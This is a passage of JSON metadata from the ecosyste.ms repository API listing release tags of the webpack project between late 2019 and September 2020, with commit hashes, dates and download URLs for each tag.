https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://rep